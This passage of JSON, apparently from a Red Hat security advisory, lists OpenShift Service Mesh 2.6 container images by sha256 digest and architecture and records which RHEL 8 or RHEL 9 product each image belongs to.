"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"product_id": "openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"product_identification_helper": {
"purl": "pkg:oci/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8\u0026tag=2.6.2-4"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"product": {
"name": "openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"product_id": "openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"product_identification_helper": {
"purl": "pkg:oci/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/istio-rhel8-operator\u0026tag=2.6.2-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"product": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"product_id": "openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8\u0026tag=2.6.2-5"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"product": {
"name": "openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"product_id": "openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"product_identification_helper": {
"purl": "pkg:oci/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel9\u0026tag=2.6.2-7"
}
}
},
{
"category": "product_version",
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"product": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"product_id": "openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f?arch=s390x\u0026repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8\u0026tag=2.6.2-3"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x"
},
"product_reference": "openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64"
},
"product_reference": "openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le"
},
"product_reference": "openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64"
},
"product_reference": "openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64"
},
"product_reference": "openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le"
},
"product_reference": "openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64"
},
"product_reference": "openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x"
},
"product_reference": "openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le"
},
"product_reference": "openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64"
},
"product_reference": "openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x"
},
"product_reference": "openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64"
},
"product_reference": "openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le"
},
"product_reference": "openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64"
},
"product_reference": "openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x"
},
"product_reference": "openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64"
},
"product_reference": "openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64"
},
"product_reference": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x"
},
"product_reference": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le"
},
"product_reference": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64"
},
"product_reference": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x"
},
"product_reference": "openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le"
},
"product_reference": "openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64"
},
"product_reference": "openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64"
},
"product_reference": "openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64"
},
"product_reference": "openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64"
},
"product_reference": "openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x"
},
"product_reference": "openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le"
},
"product_reference": "openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le"
},
"product_reference": "openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64"
},
"product_reference": "openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x"
},
"product_reference": "openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64"
},
"product_reference": "openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64"
},
"product_reference": "openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le"
},
"product_reference": "openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64"
},
"product_reference": "openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x"
},
"product_reference": "openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le as a component of RHOSSM 2.6 for RHEL 9",
"product_id": "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le"
},
"product_reference": "openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"relates_to_product_reference": "9Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64 as a component of RHOSSM 2.6 for RHEL 9",
"product_id": "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64"
},
"product_reference": "openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"relates_to_product_reference": "9Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x as a component of RHOSSM 2.6 for RHEL 9",
"product_id": "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x"
},
"product_reference": "openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"relates_to_product_reference": "9Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64 as a component of RHOSSM 2.6 for RHEL 9",
"product_id": "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
},
